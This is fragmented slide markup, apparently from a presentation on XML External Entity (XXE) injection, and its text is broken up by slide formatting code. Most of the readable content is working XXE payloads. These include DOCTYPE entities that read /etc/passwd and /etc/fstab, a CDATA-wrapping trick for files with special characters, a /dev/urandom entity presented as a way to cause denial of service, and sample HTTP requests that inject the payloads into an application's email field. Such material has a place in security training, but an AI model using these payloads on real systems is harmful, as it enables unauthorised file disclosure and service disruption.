              <a:t>Read Local Files e.g. &lt;!DOCTYPE name [ &lt;!ENTITY read PUBLIC "file:///etc/passwd"&gt;]&gt;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55" name="Google Shape;255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PUBLIC "file:///etc/passwd"&gt;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9" name="Google Shape;25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Read Local Files e.g. &lt;!DOCTYPE name [ &lt;!ELEMENT root ANY &gt; &lt;!ENTITY read SYSTEM "file:///etc/passwd"&gt;]&gt;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&lt;?xml version="1.0"?&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF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&lt;!DOCTYPE root [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&lt;!ELEMENT root ANY &gt; </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;!ENTITY % read SYSTEM "file:///etc/passwd"&gt;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]&gt;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&amp;read;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9" name="Google Shape;269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4" name="Google Shape;274;p4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Will Read Files Contains Special Characters e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>etc/fstab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So You Will Need Using &lt;![CDATA[ ]]&gt;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Bypass This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81" name="Google Shape;281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/xml-body HTTP/1.1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www.company.com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Content-Type: application/xml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&lt;?xml version="1.0"?&gt; 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&lt;!DOCTYPE root [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start "&lt;![CDATA["&gt;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file SYSTEM "file:///etc/fstab"&gt;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end "]]&gt;"&gt;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&lt;!ENTITY read "&amp;start;&amp;file;&amp;end;"&gt;]&gt;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&lt;root&gt;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&lt;email&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;read;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="900">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/email&gt;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&lt;password&gt;*********&lt;/password&gt;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&lt;/root&gt;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282" name="Google Shape;282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3" name="Google Shape;283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5" name="Google Shape;28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763" y="2675525"/>
            <a:ext cx="467526" cy="3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Read Large Files e.g. &lt;!DOCTYPE name [ &lt;!ENTITY read SYSTEM "file:///dev/urandom"&gt;]&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To Do DOS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3" name="Google Shape;293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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> [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&lt;!ENTITY read SYSTEM "file:///dev/urandom"&gt;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]&gt;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94" name="Google Shape;294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763" y="3093288"/>
            <a:ext cx="467526" cy="36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02325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Read Local Files e.g. &lt;!DOCTYPE read SYSTEM "file:///etc/passwd"&gt;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/xml-body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Content-Type: application/xml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&lt;?xml version="1.0"?&gt; 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&lt;!DOCTYPE read SYSTEM "file:///etc/passwd"&gt;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&lt;root&gt;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&lt;email&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;read;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/email&gt;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&lt;password&gt;*********&lt;/password&gt;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&lt;/root&gt;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250" y="2675525"/>
            <a:ext cx="49055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